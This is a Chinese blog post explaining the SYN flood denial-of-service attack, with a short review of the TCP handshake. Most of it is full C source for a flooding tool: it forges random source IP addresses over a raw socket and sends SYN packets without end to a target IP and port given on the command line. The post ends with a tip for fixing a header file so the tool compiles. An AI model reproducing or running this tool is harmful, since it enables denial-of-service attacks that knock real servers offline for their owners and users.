在理解SYN攻击之前我们首先来复习一下TCP的相关知识:
TCP的三次连接就是这样的。
当成功建立连接的时候,服务端/客户端双方都会变更为ESTABLISED状态,但是对于服务端而言,还存在着一个状态。叫做办连接的状态,也就是处于SYN_RCVD状态,一直在等待客户端发送连接ACK的确认返回。
如果发现有很多SYN_RCVD状态,那你的机器有可能被SYN Flood的DoS(拒绝服务攻击)攻击了。 SYN Flood的攻击原理是: 在进行三次握手时,攻击软件向被攻击的服务器发送SYN连接请求(握手的第一步),但是这个地址是伪造的,如攻击软件随机伪造了51.133.163.104、65.158.99.152等等地址。服务器在收到连接请求时将标志位ACK和SYN置1发送给客户端(握手的第二步),但是这些客户端的IP地址都是伪造的,服务器根本找不到客户机,也就是说握手的第三步不可能完成。 这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接,这段时间的长度我们称为SYN Timeout,一般来说这个时间是分钟的数量级(大约为30秒-2分钟);一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题,但如果有一个恶意的攻击者大量模拟这种情况,服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源----数以万计的半连接,即使是简单的保存并遍历也会消耗非常多的CPU时间和内存,何况还要不断对这个列表中的IP进行SYN+ACK的重试。此时从正常客户的角度看来,服务器失去响应,这种情况我们称做:服务器端受到了SYN Flood攻击(SYN洪水攻击)
下面是源码:
#include <stdio.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <asm/types.h>
#include <linux/ip.h>
#include <linux/tcp_new.h>
#include <netdb.h>
#include <sys/time.h>
#define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min))
void send_tcp(int sockfd,struct sockaddr_in *addr);
unsigned short checksum(unsigned short *buffer, int size);
unsigned short random_port(unsigned short minport,unsigned short maxport);
void random_ip(char *str);
int main(int argc,char **argv){
int sockfd;
struct sockaddr_in addr;
//int dport;
int on=1;
if(argc!=3){
printf("usage: <command_name> <target_ip> <port>\n");
exit(1);
}
bzero(&addr,sizeof(struct sockaddr_in));
addr.sin_family=AF_INET;
addr.sin_port=htons(atoi(argv[2]));
inet_pton(AF_INET,argv[1],&addr.sin_addr);
sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);
if(sockfd<0){
printf("Socket error!\n");
exit(1);
}
setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));
while(1){
send_tcp(sockfd,&addr);
}
return 0;
}
void send_tcp(int sockfd,struct sockaddr_in *addr){
char buff[100];
struct iphdr ip_header;
struct tcphdr tcp_header;
unsigned short source_port=random_port(1024,5000);
char ip_str[50];
struct in_addr ip;
random_ip(ip_str);
if(inet_aton(ip_str,&ip)==0){
printf("inet_aton error!\n");
exit(1);
}
bzero(buff,100);
ip_header.version=4;
ip_header.ihl=5;
ip_header.tos=0;
ip_header.tot_len=sizeof(struct iphdr)+sizeof(struct tcphdr);
ip_header.id=htons(random());
ip_header.frag_off=0;
ip_header.ttl=30;
ip_header.protocol=IPPROTO_TCP;
ip_header.check=0;
ip_header.saddr=ip.s_addr;
ip_header.daddr=addr->sin_addr.s_addr;
tcp_header.source=htons(source_port);
tcp_header.dest=addr->sin_port;
tcp_header.seq=rand();
tcp_header.doff=sizeof(struct tcphdr)/4;
tcp_header.ack_seq=0;
tcp_header.res1=0;
tcp_header.fin=0;
tcp_header.syn=1;
tcp_header.rst=0;
tcp_header.psh=0;
tcp_header.ack=0;
tcp_header.urg=0;
tcp_header.window=htons(65535);
tcp_header.check=0;
tcp_header.urg_ptr=0;
struct{
unsigned long saddr;
unsigned long daddr;
char mbz;
char ptcl;
unsigned short tcpl;
}psd_header;
psd_header.saddr=ip_header.saddr;
psd_header.daddr=ip_header.daddr;
psd_header.mbz=0;
psd_header.ptcl=IPPROTO_TCP;
psd_header.tcpl=htons(sizeof(struct tcphdr));
memcpy(buff,&psd_header,sizeof(psd_header));
memcpy(buff+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
tcp_header.check=checksum((unsigned short*)buff,sizeof(psd_header)+sizeof(tcp_header));
memcpy(buff,&ip_header,4*ip_header.ihl);
memcpy(buff+4*ip_header.ihl,&tcp_header,sizeof(tcp_header));
ip_header.check=checksum((unsigned short*)buff,4*ip_header.ihl+sizeof(tcp_header));
sendto(sockfd,buff,sizeof(struct iphdr)+sizeof(struct tcphdr),0,
(struct sockaddr*)addr,sizeof(struct sockaddr_in));
}
unsigned short checksum(unsigned short *buffer, int size){
unsigned long cksum=0;
while(size >1) {
cksum+=*buffer++;
size -=sizeof(unsigned short);
}
if(size ) cksum += *(unsigned char*)buffer; //..buffer..size..2......
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (unsigned short)(~cksum);
}
unsigned short random_port(unsigned short minport,unsigned short maxport){
srand((unsigned)time(NULL));
return(getrandom(minport,maxport));
}
void random_ip(char *str){
int a,b,c,d,i=0;
static long j=0;
srand((unsigned)time(NULL)+(i++)+(j++));
a=getrandom(0,255);
srand((unsigned)time(NULL)+(i++)+(j++));
b=getrandom(0,255);
srand((unsigned)time(NULL)+(i++)+(j++));
c=getrandom(0,255);
srand((unsigned)time(NULL)+(i++)+(j++));
d=getrandom(0,255);
sprintf(str,"%d.%d.%d.%d",a,b,c,d);
printf("%s\n",str);
}
//缺少。
enum {
TCP_FLAG_CWR = htonl(0x00800000)
TCP_FLAG_ECE = htonl(0x00400000),
TCP_FLAG_URG = htonl(0x00200000),
TCP_FLAG_ACK = htonl(0x00100000),
TCP_FLAG_PSH = htonl(0x00080000),
TCP_FLAG_RST = htonl(0x00040000),
TCP_FLAG_SYN = htonl(0x00020000),
TCP_FLAG_FIN = htonl(0x00010000),
TCP_RESERVED_BITS = htonl(0x0FC000000),
TCP_DATA_OFFSET = htonl(0xF0000000)
};
解决办法:将tcp.h的内容拷贝到另一个新建的文件tcp_new.h中,在新文件中去掉上面几行代码中的htonl,在自己的文件中用#include <linux/tcp_new.h>代替#include <linux/tcp.h>即可。
以上
本文出自 “剩蛋君” 博客,转载请与作者联系!